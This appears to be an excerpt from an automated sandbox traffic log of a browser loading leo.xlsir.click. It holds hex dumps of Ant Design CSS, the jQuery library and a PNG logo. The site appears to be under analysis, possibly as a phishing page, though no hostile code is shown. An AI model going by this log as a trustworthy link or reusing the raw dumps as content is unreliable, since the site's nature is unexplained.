2024-05-27 22:35:29 UTC	1369	IN	Data Raw: 61 73 73 2a 3d 22 20 61 6e 74 2d 66 6f 72 6d 22 5d 20 5b 63 6c 61 73 73 2a 3d 22 20 61 6e 74 2d 66 6f 72 6d 22 5d 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 2e 61 6e 74 2d 66 6f 72 6d 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c Data Ascii: ass=" ant-form"] [class=" ant-form"]::after { box-sizing: border-box; } :where(.css-18iikkb).ant-form { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0,
2024-05-27 22:35:29 UTC	1369	IN	Data Raw: 3d 22 66 69 6c 65 22 5d 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 2e 61 6e 74 2d 66 6f 72 6d 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 6e 67 65 22 5d 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 2e 61 6e 74 2d 66 6f 72 6d 20 73 65 6c 65 63 74 5b 6d 75 6c 74 69 70 6c 65 5d 2c 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 Data Ascii: ="file"] { display: block; } :where(.css-18iikkb).ant-form input[type="range"] { display: block; width: 100%; } :where(.css-18iikkb).ant-form select[multiple], :where(
2024-05-27 22:35:29 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 2e 61 6e 74 2d 66 6f 72 6d 2d 6c 61 72 67 65 20 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 20 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b Data Ascii: height: 40px; } :where(.css-18iikkb).ant-form-large .ant-form-item .ant-form-item-control-input { min-height: 40px; } :where(.css-18iikkb).ant-form-item { box-sizing: border-box;
2024-05-27 22:35:29 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 65 6e 64 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 20 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 2d 6c 61 62 65 6c 2d 6c 65 66 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 73 74 61 72 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 2e 61 Data Ascii: white-space: nowrap; text-align: end; vertical-align: middle; } :where(.css-18iikkb).ant-form-item .ant-form-item-label-left { text-align: start; } :where(.css-18iikkb).a
2024-05-27 22:35:29 UTC	1369	IN	Data Raw: 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 2d 6c 61 62 65 6c 3e 6c 61 62 65 6c 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 2d 72 65 71 75 69 72 65 64 3a 6e 6f 74 28 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 2d 72 65 71 75 69 72 65 64 2d 6d 61 72 6b 2d 6f 70 74 69 6f 6e 61 6c 29 3a 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 20 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 2d 6c 61 62 65 6c 3e 6c 61 62 65 6c 20 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 2d 6f 70 74 69 6f 6e 61 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 Data Ascii: .ant-form-item-label>label.ant-form-item-required:not(.ant-form-item-required-mark-optional)::before { display: none; } :where(.css-18iikkb).ant-form-item .ant-form-item-label>label .ant-form-item-optional { d
2024-05-27 22:35:29 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 20 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 2d 63 6f 6e 74 72 6f 6c 3a 66 69 72 73 74 2d 63 68 69 6c 64 3a 6e 6f 74 28 5b 63 6c 61 73 73 5e 3d 22 27 61 6e 74 2d 63 6f 6c 2d 27 22 5d 29 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 27 20 61 6e 74 2d 63 6f 6c 2d 27 22 5d 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 20 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 Data Ascii: } :where(.css-18iikkb).ant-form-item .ant-form-item-control:first-child:not([class^="'ant-col-'"]):not([class*="' ant-col-'"]) { width: 100%; } :where(.css-18iikkb).ant-form-item .ant-form-item-control-inp
2024-05-27 22:35:29 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 2d 77 69 74 68 2d 68 65 6c 70 20 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 2d 65 78 70 6c 61 69 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 20 2e 61 6e 74 2d 66 6f 72 6d 2d 69 74 65 6d 2d 66 65 65 64 62 61 63 6b 2d 69 63 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 Data Ascii: } :where(.css-18iikkb).ant-form-item-with-help .ant-form-item-explain { height: auto; opacity: 1; } :where(.css-18iikkb).ant-form-item .ant-form-item-feedback-icon { font-size: 14

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:29 UTC	563	OUT	GET /jquery-3.7.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://leo.xlsir.click sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://leo.xlsir.click/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:29 UTC	567	IN	HTTP/1.1 200 OK Connection: close Content-Length: 87533 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-155ed" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Age: 2707126 Date: Mon, 27 May 2024 22:35:29 GMT X-Served-By: cache-lga21978-LGA, cache-nyc-kteb1890092-NYC X-Cache: HIT, HIT X-Cache-Hits: 31, 0 X-Timer: S1716849330.936330,VS0,VE1 Vary: Accept-Encoding
2024-05-27 22:35:29 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.7.1 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2024-05-27 22:35:29 UTC	1378	IN	Data Raw: 3d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 63 65 2e 66 6e 3d 63 65 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 6a 71 75 65 72 79 3a 74 2c 63 6f 6e 73 74 72 75 63 74 6f 72 3a 63 65 2c 6c 65 6e 67 74 68 3a 30 2c 74 6f 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 61 65 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 65 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e Data Ascii: ==t.toLowerCase()}ce.fn=ce.prototype={jquery:t,constructor:ce,length:0,toArray:function(){return ae.call(this)},get:function(e){return null==e?ae.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=ce.merge(this.constructor(),e);return
2024-05-27 22:35:29 UTC	1378	IN	Data Raw: 22 2b 28 74 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 72 65 70 6c 61 63 65 28 2f 5c 44 2f 67 2c 22 22 29 2c 69 73 52 65 61 64 79 3a 21 30 2c 65 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 65 29 7d 2c 6e 6f 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 69 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 75 65 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 Data Ascii: "+(t+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e\|\|"[object Object]"!==i.call(e))&&(!(t=r(e))\|\|"function"==typeof(n=ue.call(t,"constructor")&&t.constructor
2024-05-27 22:35:29 UTC	1378	IN	Data Raw: 74 75 72 6e 20 67 28 61 29 7d 2c 67 75 69 64 3a 31 2c 73 75 70 70 6f 72 74 3a 6c 65 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 63 65 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 6f 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 63 65 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 74 2b 22 5d 22 5d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 76 61 72 20 70 65 3d 6f 65 2e Data Ascii: turn g(a)},guid:1,support:le}),"function"==typeof Symbol&&(ce.fn[Symbol.iterator]=oe[Symbol.iterator]),ce.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var pe=oe.
2024-05-27 22:35:29 UTC	1378	IN	Data Raw: 67 45 78 70 28 22 5e 22 2b 67 65 2b 22 2a 2c 22 2b 67 65 2b 22 2a 22 29 2c 6d 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 67 65 2b 22 2a 28 5b 3e 2b 7e 5d 7c 22 2b 67 65 2b 22 29 22 2b 67 65 2b 22 2a 22 29 2c 78 3d 6e 65 77 20 52 65 67 45 78 70 28 67 65 2b 22 7c 3e 22 29 2c 6a 3d 6e 65 77 20 52 65 67 45 78 70 28 67 29 2c 41 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 74 2b 22 24 22 29 2c 44 3d 7b 49 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 23 28 22 2b 74 2b 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 74 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 74 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 70 29 2c 50 53 45 55 44 4f Data Ascii: gExp("^"+ge+","+ge+""),m=new RegExp("^"+ge+"([>+~]\|"+ge+")"+ge+""),x=new RegExp(ge+"\|>"),j=new RegExp(g),A=new RegExp("^"+t+"$"),D={ID:new RegExp("^#("+t+")"),CLASS:new RegExp("^\\.("+t+")"),TAG:new RegExp("^("+t+"\|[*])"),ATTR:new RegExp("^"+p),PSEUDO
2024-05-27 22:35:29 UTC	1378	IN	Data Raw: 26 28 75 3d 4c 2e 65 78 65 63 28 74 29 29 29 69 66 28 69 3d 75 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 70 29 7b 69 66 28 21 28 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 69 29 29 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 61 2e 69 64 3d 3d 3d 69 29 72 65 74 75 72 6e 20 6b 2e 63 61 6c 6c 28 6e 2c 61 29 2c 6e 7d 65 6c 73 65 20 69 66 28 66 26 26 28 61 3d 66 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 69 29 29 26 26 49 2e 63 6f 6e 74 61 69 6e 73 28 65 2c 61 29 26 26 61 2e 69 64 3d 3d 3d 69 29 72 65 74 75 72 6e 20 6b 2e 63 61 6c 6c 28 6e 2c 61 29 2c 6e 7d 65 6c 73 65 7b 69 66 28 75 5b 32 5d 29 72 65 74 75 72 6e 20 6b 2e 61 70 70 6c 79 28 6e 2c 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 29 2c 6e 3b 69 66 28 28 69 3d 75 Data Ascii: &(u=L.exec(t)))if(i=u[1]){if(9===p){if(!(a=e.getElementById(i)))return n;if(a.id===i)return k.call(n,a),n}else if(f&&(a=f.getElementById(i))&&I.contains(e,a)&&a.id===i)return k.call(n,a),n}else{if(u[2])return k.apply(n,e.getElementsByTagName(t)),n;if((i=u
2024-05-27 22:35:29 UTC	1378	IN	Data Raw: 65 29 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 22 6c 61 62 65 6c 22 69 6e 20 65 26 26 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 58 28 61 29 7b 72 65 74 75 72 6e 20 46 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 2b 6f 2c 46 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 Data Ascii: e)===t:e.disabled===t:"label"in e&&e.disabled===t}}function X(a){return F(function(o){return o=+o,F(function(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function U(e){return e&&"undefined"!=typeof e.getElementsByT
2024-05-27 22:35:29 UTC	1378	IN	Data Raw: 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 3b 69 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 65 29 2c 72 3d 30 3b 77 68 69 6c 65 28 6f 3d 69 5b 72 2b 2b 5d 29 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 Data Ascii: ((n=o.getAttributeNode("id"))&&n.value===e)return[o];i=t.getElementsByName(e),r=0;while(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTa
2024-05-27 22:35:29 UTC	1378	IN	Data Raw: 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 6c 65 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 3d 54 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 79 65 26 26 49 2e 63 6f 6e 74 61 69 6e 73 28 79 65 2c 65 29 3f 2d 31 3a 74 3d 3d 3d 54 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 79 65 26 26 49 2e 63 6f 6e 74 61 69 6e 73 28 79 65 2c 74 29 3f 31 3a 6f 3f 73 65 2e 63 61 6c 6c 28 6f 2c 65 29 2d 73 65 2e 63 61 6c 6c 28 6f 2c 74 29 3a 30 3a 34 26 Data Ascii: =(e.ownerDocument\|\|e)==(t.ownerDocument\|\|t)?e.compareDocumentPosition(t):1)\|\|!le.sortDetached&&t.compareDocumentPosition(e)===n?e===T\|\|e.ownerDocument==ye&&I.contains(ye,e)?-1:t===T\|\|t.ownerDocument==ye&&I.contains(ye,t)?1:o?se.call(o,e)-se.call(o,t):0:4&
2024-05-27 22:35:29 UTC	1378	IN	Data Raw: 72 3a 7b 41 54 54 52 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 31 5d 3d 65 5b 31 5d 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 2c 65 5b 33 5d 3d 28 65 5b 33 5d 7c 7c 65 5b 34 5d 7c 7c 65 5b 35 5d 7c 7c 22 22 29 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 2c 22 7e 3d 22 3d 3d 3d 65 5b 32 5d 26 26 28 65 5b 33 5d 3d 22 20 22 2b 65 5b 33 5d 2b 22 20 22 29 2c 65 2e 73 6c 69 63 65 28 30 2c 34 29 7d 2c 43 48 49 4c 44 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 31 5d 3d 65 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 22 6e 74 68 22 3d 3d 3d 65 5b 31 5d 2e 73 6c 69 63 65 28 30 2c 33 29 3f 28 65 5b 33 5d 7c 7c 49 2e 65 72 72 6f 72 28 65 5b 30 5d 29 2c 65 5b 34 5d 3d 2b 28 65 5b 34 5d 3f 65 5b 35 5d 2b 28 65 5b 36 5d 7c Data Ascii: r:{ATTR:function(e){return e[1]=e[1].replace(O,P),e[3]=(e[3]\|\|e[4]\|\|e[5]\|\|"").replace(O,P),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]\|\|I.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]\|

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:29 UTC	603	OUT	GET /images/logo.meta.png HTTP/1.1 Host: leo.xlsir.click Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://leo.xlsir.click/home.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:30 UTC	791	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 22:35:29 GMT Content-Type: image/png Content-Length: 31947 Connection: close last-modified: Sat, 18 May 2024 04:53:30 GMT etag: "6648344a-7ccb" x-powered-by: DLEMP expires: Tue, 25 Jun 2024 18:57:26 GMT Cache-Control: public, max-age=2592000, must-revalidate, proxy-revalidate CF-Cache-Status: HIT Age: 99451 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2Fqnpyjk71GLpUuFDq9mCXJ0d5EzfMc828qYRlQOZyt5%2BVF0VmiD9UNOnHs3SXs9bstMxiLqx2aZJXOGBpIpfsKIQ1S21e4ES21F0N3AFOKOFVm%2Bhsyr%2BtVoQtAqc1xhllY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a97a782f8f0cc8-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 22:35:30 UTC	578	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 0d 00 00 01 38 08 06 00 00 00 68 9e b3 95 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 7c 60 49 44 41 54 78 01 ed dd 07 bc b7 73 fd c7 f1 b7 a8 8c ec 51 19 b9 c9 8a 50 29 22 99 51 44 25 45 8a a8 a8 ec 5d 66 64 6f 42 ea 6f 65 2b a3 6c a9 cc 24 a2 8c 22 7b af b2 37 95 fc df 1f bf eb d6 71 bb cf 7d 7e e7 9c df b8 3e df eb f5 7c 3c 3e 8f ef 09 71 9f eb fa 5e eb 3b 3e 9f 89 84 46 79 ed b5 d7 3e e4 e6 13 8e 45 1c f3 3a de e7 98 ca 31 89 63 e2 2a de e6 98 a8 8a f1 79 d6 f1 b4 e3 19 c7 13 8e 47 1c f7 39 ee 77 dc ed 78 30 da 89 26 9a e8 25 01 49 f9 